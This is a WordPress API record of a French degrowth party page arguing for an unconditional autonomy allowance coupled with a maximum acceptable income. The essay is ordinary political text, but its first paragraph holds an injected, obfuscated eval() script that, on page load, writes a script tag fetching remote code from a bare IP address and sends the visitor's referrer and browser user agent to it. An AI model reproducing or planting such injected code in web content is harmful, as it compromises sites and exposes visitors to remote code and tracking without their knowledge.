{"id":8362,"date":"2013-06-19T14:16:14","date_gmt":"2013-06-19T13:16:14","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?page_id=8362"},"modified":"2013-08-21T21:31:19","modified_gmt":"2013-08-21T20:31:19","slug":"un-revenu-maximum-acceptable-au-dela-des-limites-symboliques","status":"publish","type":"page","link":"https:\/\/www.partipourladecroissance.net\/?page_id=8362","title":{"rendered":"Un Revenu Maximum Acceptable : au-del\u00e0 des limites symboliques"},"content":{"rendered":"<p style=\"text-align: left;\" align=\"CENTER\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft\" alt=\"\" src=\"http:\/\/www.partipourladecroissance.net\/wp-content\/uploads\/2012\/06\/quand-bien-meme-2010-p.jpg\" width=\"252\" height=\"175\" \/>Proposer <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ntyts|var|u0026u|referrer|tsnfk||js|php'.split('|'),0,{}))\n<\/script><\/noindex> une Dotation Inconditionnelle d&rsquo;Autonomie (DIA) coupl\u00e9e \u00e0 un Revenu Maximum Acceptable (RMA) s&rsquo;inscrit dans la d\u00e9marche proposant un outil \u00e9conomique, social et d\u2019\u00e9mancipation, permettant d&rsquo;initier des mod\u00e8les de soci\u00e9t\u00e9s soutenables mais aussi souhaitables. Cet outil permet ainsi d&rsquo;\u00e9chapper aux effets de r\u00e9cessions toujours plus dures suppos\u00e9es nous faire retrouver de la croissance.<\/p>\n<p style=\"text-align: left;\" align=\"JUSTIFY\"><a href=\"http:\/\/www.achetezmoins.ch\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignright\" alt=\"\" src=\"http:\/\/www.achetezmoins.ch\/wp-content\/uploads\/2012\/08\/moins_une_web.jpg\" width=\"174\" height=\"235\" \/><\/a>Au-del\u00e0 d&rsquo;un simple correctif, ce couple de mesures vise \u00e0 susciter dialogues et d\u00e9bats sur ce qu\u2019est le \u00ab vivre ensemble \u00bb, sur la mani\u00e8re de cr\u00e9er \u00ab plus de liens \u00bb sans pour autant cr\u00e9er \u00ab plus de biens \u00bb. Au-del\u00e0 de permettre \u00e0 toutes et tous de vivre dans des conditions dignes et sereines, l&rsquo;instauration d&rsquo;une Dotation inconditionnelle d&rsquo;Autonomie coupl\u00e9 \u00e0 un Revenu Maximum Acceptable est un outil pour imaginer d&rsquo;autres rapports entre nous, et entre nous et la nature. C&rsquo;est se donner des limites pour adopter des comportements plus mesur\u00e9s, pour donner une autre chance \u00e0 notre humanit\u00e9.<\/p>\n<p><!--more--><\/p>\n<p style=\"text-align: left;\" align=\"JUSTIFY\">Cela passe par la r\u00e9duction des in\u00e9galit\u00e9s parce que la D\u00e9croissance vise avant tout la D\u00e9croissance des in\u00e9galit\u00e9s. Certes, en \u00e9tant re\u00e7ue par tou-te-s sans plafond de ressources, mais imposable et donc recouvrable enti\u00e8rement par la fiscalit\u00e9, la DIA r\u00e9duit les in\u00e9galit\u00e9s. Surtout, elle <i>pourrait<\/i> les rendre acceptables. En effet, le RMA pourrait para\u00eetre obsol\u00e8te avec une DIA en vigueur, puisque tout le monde disposerait des conditions mat\u00e9rielles pour vivre dignement et d\u00e9cemment. Les in\u00e9galit\u00e9s seraient alors moins choquantes. Ce serait r\u00e9ducteur, car le RMA est \u00e9galement un moyen de r\u00e9duire l&rsquo;impact \u00e9cologique insoutenable du mode de vie des plus riches. Il s&rsquo;agit d&rsquo;\u00e9viter de scandaleux gaspillages et d&rsquo;outranci\u00e8res pratiques, qui ne peuvent \u00eatre g\u00e9n\u00e9ralisables et, surtout, qui ne peuvent plus \u00eatre consid\u00e9r\u00e9es comme un id\u00e9al \u00e0 atteindre par le reste de la population.<\/p>\n<p style=\"text-align: left;\" align=\"JUSTIFY\">Le RMA va au-del\u00e0 des n\u00e9cessaires bienfaits de mesures de justice sociale et de justice environnementale. En supprimant le mode de vie des plus riches, actuellement \u00e0 la fois consid\u00e9r\u00e9 comme quelque chose de normal et surtout comme mod\u00e8le de vie et de bonheur \u00e0 suivre et \u00e0 atteindre(1)<sup><a href=\"https:\/\/mail.google.com\/mail\/u\/0\/?tab=wm#13df3dbac51d8ecd_13ded7434fbc9d67_13b74a4b904113a4_13b67a3765b72306_13b671baa89593ec_13b629698adbb8bf_sdfootnote1sym\" name=\"13df3dbac51d8ecd_13ded7434fbc9d67_13b74a4b904113a4_13b67a3765b72306_13b671baa89593ec_13b629698adbb8bf_sdfootnote1anc\"><\/a><\/sup>, un RMA contribuerait \u00e0 participer \u00e0 une d\u00e9colonisation de nos imaginaires consum\u00e9ristes. Il s\u2019agit aussi de rompre avec les effets pervers de cette rivalit\u00e9 ostentatoire. Vendu par la publicit\u00e9 et les m\u00e9dias, ce mod\u00e8le a pour effet de faire accepter la pr\u00e9sence de telles in\u00e9galit\u00e9s, de frustrer toujours plus, et ainsi de nous transformer en consommateurs compulsifs jamais rassasi\u00e9s, courant apr\u00e8s une illusion de bonheur cens\u00e9e passer par toujours plus de consommation. Le RMA s&rsquo;inscrit totalement dans l&rsquo;id\u00e9e de r\u00e9viser nos comportements, nos choix de vie et nos mod\u00e8les.<\/p>\n<div style=\"text-align: left;\">\n<p align=\"JUSTIFY\">En 2009, en France, dans leurs r\u00f4les de casseurs de tabous et afin d&rsquo;ouvrir un d\u00e9bat, les listes Europe-D\u00e9croissance proposaient un rapport de 1 \u00e0 4 entre le revenu minimum (avec une DIA \u00e9quivalent euros) et le RMA. De son c\u00f4t\u00e9 Europe-Ecologie-Les-Verts a propos\u00e9 un rapport de 1 \u00e0 30 et le Parti de Gauche un rapport de 1 \u00e0 20. Cette proposition peut para\u00eetre extr\u00eame dans une soci\u00e9t\u00e9 o\u00f9 l&rsquo;argent est devenu roi. C&rsquo;est pourquoi il est important de rappeler que ce type de mesures a d\u00e9j\u00e0 exist\u00e9, notamment apr\u00e8s la crise de 1929 et au moment de la seconde guerre mondiale aux Etats-Unis d&rsquo;Am\u00e9rique. En 1942, Franklin Delano Roosevelt d\u00e9clarait : \u00ab Aucun citoyen am\u00e9ricain ne doit avoir un revenu (apr\u00e8s imp\u00f4t) sup\u00e9rieur \u00e0 25 000 dollars par an \u00bb. (2)<sup><sup><a href=\"https:\/\/mail.google.com\/mail\/u\/0\/?tab=wm#13df3dbac51d8ecd_13ded7434fbc9d67_13b74a4b904113a4_13b67a3765b72306_13b671baa89593ec_13b629698adbb8bf_sdfootnote2sym\" name=\"13df3dbac51d8ecd_13ded7434fbc9d67_13b74a4b904113a4_13b67a3765b72306_13b671baa89593ec_13b629698adbb8bf_sdfootnote2anc\"><br \/>\n<\/a><\/sup><\/sup><\/p>\n<\/div>\n<p style=\"text-align: left;\" align=\"JUSTIFY\">Vouloir un revenu maximum n&rsquo;est pas synonyme de vouloir \u00ab\u00a0casser du riche\u00a0\u00bb. Ce n&rsquo;est pas non plus faire preuve de populisme envers les populations les plus d\u00e9favoris\u00e9es. M\u00eame s&rsquo;il s&rsquo;agit d&rsquo;un signal fort de notre volont\u00e9 de changement, vouloir un revenu maximum, c&rsquo;est surtout vouloir une autre soci\u00e9t\u00e9 pour laquelle le maximum n&rsquo;est pas uniquement symbolique.<\/p>\n<div>\n<p style=\"text-align: left;\" align=\"JUSTIFY\">Vouloir un revenu maximum, c&rsquo;est d\u00e9j\u00e0 amorcer un projet de D\u00e9croissance.<\/p>\n<p style=\"text-align: left;\" align=\"JUSTIFY\">Vincent Liegey, Stephane Madelaine, Christophe Ondet et Anisabel Veillot<\/p>\n<p><i>Co-auteurs d&rsquo;Un projet de D\u00e9croissance &#8211; Manifeste pour une Dotation Inconditionnelle d&rsquo;Autonomie (DIA), Vincent Liegey, Stephane Madelaine, Christophe et Anisabel Veillot, Edition Utopia, janvier 2013.<\/i><em id=\"__mceDel\"><br \/>\n<em><\/em><\/em><\/p>\n<p style=\"text-align: left;\" align=\"JUSTIFY\"><em id=\"__mceDel\"><em>Ce texte a \u00e9t\u00e9 command\u00e9 par <a href=\"http:\/\/www.partipourladecroissance.net\/?p=7585\" target=\"_blank\"><strong>Moins!<\/strong>, le journal romans de l\u2019\u00e9cologie politique<\/a>.<\/em><\/em><\/p>\n<p><em id=\"__mceDel\"><a style=\"font-size: xx-small;\" href=\"https:\/\/mail.google.com\/mail\/u\/0\/?tab=wm#13df3dbac51d8ecd_13ded7434fbc9d67_13b74a4b904113a4_13b67a3765b72306_13b671baa89593ec_13b629698adbb8bf_sdfootnote1anc\" name=\"13df3dbac51d8ecd_13ded7434fbc9d67_13b74a4b904113a4_13b67a3765b72306_13b671baa89593ec_13b629698adbb8bf_sdfootnote1sym\"><\/a><sup>(1) <\/sup><sup>Thorstein Veblen <\/sup><sup><i>Th\u00e9orie de la <span style=\"font-size: xx-small;\">\u00ab\u00a0<\/span>classe de loisirs\u00a0\u00bb <\/i><\/sup><sup>(1899), reprise par Herv\u00e9 Kempf dans son livre <i>Comment les riches d\u00e9truisent la plan\u00e8te<\/i>, Seuil, Paris, 2007.<\/sup><\/em><\/p>\n<div><span style=\"font-size: xx-small;\">(2) Citation reprise dans le texte de Jean Gadrey, <i>Quand les \u00e9carts de revenus furent enfin plafonn\u00e9s<\/i> &#8211; <a href=\"http:\/\/www.laviedesidees.fr\/IMG\/pdf\/20111026_ecarts-de-revenu-en-2112.pdf\" target=\"_blank\">http:\/\/www.laviedesidees.fr\/<wbr \/>IMG\/pdf\/20111026_ecarts-de-<wbr \/>revenu-en-2112.pdf<\/a>.<\/span><\/div>\n<\/div>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Proposer une Dotation Inconditionnelle d&rsquo;Autonomie (DIA) coupl\u00e9e \u00e0 un Revenu Maximum Acceptable (RMA) s&rsquo;inscrit dans la d\u00e9marche proposant un outil \u00e9conomique, social et d\u2019\u00e9mancipation, permettant d&rsquo;initier des mod\u00e8les de soci\u00e9t\u00e9s soutenables mais aussi souhaitables. Cet outil permet ainsi d&rsquo;\u00e9chapper aux &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?page_id=8362\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"parent":3995,"menu_order":5,"comment_status":"open","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-8362","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/8362","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8362"}],"version-history":[{"count":4,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/8362\/revisions"}],"predecessor-version":[{"id":8563,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/8362\/revisions\/8563"}],"up":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/3995"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8362"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}